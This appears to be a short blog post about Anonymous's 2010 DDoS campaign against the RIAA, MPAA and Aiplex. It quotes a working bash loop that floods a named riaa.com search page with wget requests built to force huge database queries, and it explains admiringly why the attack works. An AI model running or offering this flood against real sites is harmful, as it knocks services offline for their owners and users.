So last week Anonymous staged a Distributed Denial of Service against the RIAA, MPAA, and Aiplex over Aiplex’s announcement that they were launching DDoS attacks of their own against torrent sites sharing copyrighted content. In doing a bit of research on techniques that were being used, I came across this wonderful bit of script:
while true; do wget ‘http://riaa.com/goldandplatinumdata.php?table=SEARCH_RESULTS&title=&artist=&label=&format=&category=&type=&awardDescription=&startMonth=1&startYear=0&endMonth=12&endYear=2009&sort=Date&sense=ASC&perPage=5000000000&go=Search’ > /dev/null & done
For those of you who don’t get it just yet, this is an awesome attack to study. Basically what it does is to run an endless loop grabbing a search page url with parameters that will do a huge database query. The beauty of the attack is that it’s “highly leveraged”: for one http get, you generate a sizeable amount of database load. Now multiply that by thousands of yahoos out there running the same script, and it will rollover the target’s database server and possibly the applications servers that query it.